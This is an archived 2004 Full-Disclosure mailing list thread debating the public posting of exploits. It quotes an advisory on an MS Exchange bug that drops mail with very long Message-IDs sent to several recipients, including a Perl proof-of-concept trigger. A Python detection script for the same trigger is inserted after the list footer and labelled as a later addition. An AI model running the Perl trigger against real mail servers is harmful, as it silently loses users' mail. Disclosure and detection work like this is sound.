Full Disclosure mailing list archives
RE: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how
From: "Syed Imran Ali" <manipeto () yahoo co uk>
Date: Thu, 13 May 2004 09:25:06 +0500
I agree with Randal's point of view. Dunno abt others... Although we have been discussing this exploit posting issue since long time... the latest one was cyber punk's, hmmmm ..

4 C.P : h1ya, u rem. WFD ;) sh0utS t0 U agAin. ;)

Regards,
S. Imran Ali

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of RandallM
Sent: Thursday, May 13, 2004 6:45 AM
To: full-disclosure () lists netsys com
Subject: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how

I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then posts the "exploit" example because, in his own words,

<|>I think some people know how to use this "FEATURE" ... I hope this post
<|>will speed up the fix release!

Exactly in what way do you think this should speed up the release? Granted, this is a "lost" email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of "script Kiddies" who would never be able to find the exploit but are part of the group who "know how to use this 'FEATURE'...". They watch here and others just for that purpose. Where is accountability?

I am torn between this issue of needed knowledge and exposed exploit. As a network Administrator I have no need for the exploit but for the knowledge. I have found no better place than here for that. Then on the other hand you all give out the exploits for confirmation which is needed also.

Just some of my personal inward ramblings.

thank you
Randall M

<|>--__--__--
<|>
<|>Message: 20
<|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
<|>From: I.D.S () gmx de
<|>To: full-disclosure () lists netsys com
<|>Subject: [Full-disclosure] MS Exchange message lost
<|>
<|>* MS Exchange duplicate message fault (message lost)
<|>*
<|>* MS Exchange (all versions affected) duplicate message fault
<|>*
<|>* I discovered this bug independently on 10, 2003
<|>*
<|>* public post 05, 2004
<|>*
<|>* Helmut Schmitz < i.d.s () gmx de >
<|>*
<|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */
<|>
<|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
<|>Messages with long message ids (>189 bytes?) to more than one recipient
<|>(cc),
<|>the message will not be delivered correctly ... there is no correct logging
<|>!!,
<|>the messages will be delivered to only one Recipient ... the message to
<|>the
<|>other will be lost !!
<|>
<|>I have sent this issue to Microsoft (10.2003) ... some months later
<|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
<|>some reg settings fixes (workaround ;-) the problem.
<|>
<|>Perl Example (test exploit) ...
<|>
<|>#!/usr/bin/perl -w
<|>use Net::SMTP;
<|>$from = 'sender () yourdomain de';
<|>$to = 'user1 () yourdomain de';
<|>$cc = 'user2 () yourdomain de';
<|>$subject = 'Test Email';
<|>$smtp = Net::SMTP->new('yourmailserver');
<|>$smtp->mail($from);
<|>$smtp->to($to);
<|>$smtp->cc($cc);
<|>$smtp->data();
<|>$smtp->datasend("To: <$to>\n");
<|>$smtp->datasend("Cc: <$cc>\n");
<|>$smtp->datasend("From: <$from>\n");
<|>$smtp->datasend("Subject: $subject\n");
<|>$smtp->datasend("Message-ID:
<|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte
<|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
<|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
<|>feejktmhedgedherngrondljzhng> \n");
<|>$smtp->datasend("Hallo\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->dataend();
<|>$smtp->quit;
<|>
<|>Background:
<|>Duplicate detection is decided by three factors. These are MessageID,
<|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
<|>store. These are used to build a unique key when the message is
<|>submitted.
<|>If all the factors are the same value, then we recognize the message as
<|>duplicate.
<|>
<|>###################################
<|>
<|>I think some people know how to use this "FEATURE" ... I hope this post
<|>will speed up the fix release!
<|>
<|>Regards,
<|>Helmut Schmitz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
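
A defensive check derived from the advisory quoted above, added here as an example and not written by any poster in this thread: it flags messages that match the reported trigger (a Message-ID longer than 189 bytes sent to more than one recipient) so they can be spotted in a mail archive or at a gateway. The 189-byte threshold is the advisory's own uncertain figure; counting the angle brackets in the length, the function names and the sample messages are assumptions constructed for illustration.

```python
from email import message_from_string
from email.utils import getaddresses

# Threshold reported in the advisory (">189 bytes?"); the poster marked it uncertain.
MAX_MESSAGE_ID_BYTES = 189

def check_message(raw):
    """Return (at_risk, message_id_bytes, recipient_count) for one raw message."""
    msg = message_from_string(raw)
    # A long Message-ID is usually folded onto a continuation line; drop the
    # folding whitespace before measuring. Angle brackets are counted (assumption).
    message_id = "".join((msg.get("Message-ID") or "").split())
    id_bytes = len(message_id.encode("utf-8", "replace"))
    # Count distinct recipients named in the To and Cc headers.
    headers = msg.get_all("To", []) + msg.get_all("Cc", [])
    recipients = {addr.lower() for _, addr in getaddresses(headers) if addr}
    at_risk = id_bytes > MAX_MESSAGE_ID_BYTES and len(recipients) > 1
    return at_risk, id_bytes, len(recipients)

def flagged(samples):
    """Names of the sample messages that match the reported trigger."""
    return [name for name, raw in samples.items() if check_message(raw)[0]]

# Constructed sample data (example.test addresses, synthetic IDs).
LONG_ID = "<" + "a" * 200 + "@mail.example.test>"
SHORT_ID = "<20040512.0001@mail.example.test>"

def build(to, cc, message_id):
    """Assemble a constructed message with a folded Message-ID header."""
    lines = ["From: <sender@example.test>", f"To: {to}"]
    if cc:
        lines.append(f"Cc: {cc}")
    # Folded form: the ID sits on a continuation line after the field name.
    lines += ["Message-ID:", f" {message_id}", "Subject: Test Email", "", "body", ""]
    return "\n".join(lines)

SAMPLES = {
    "long-id-two-rcpt": build("<user1@example.test>", "<user2@example.test>", LONG_ID),
    "long-id-one-rcpt": build("<user1@example.test>", None, LONG_ID),
    "long-id-same-rcpt-twice": build("<user1@example.test>", "<USER1@example.test>", LONG_ID),
    "short-id-two-rcpt": build("<user1@example.test>", "<user2@example.test>", SHORT_ID),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, check_message(raw))
```

Header-based counting misses Bcc recipients; at an SMTP gateway the envelope RCPT TO count is the better input for the recipient test.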
Current thread:
- [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how RandallM (May 12)
- RE: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Syed Imran Ali (May 12)
- Re: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Lan Guy (May 13)
- Re: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Gerhard den Hollander (May 13)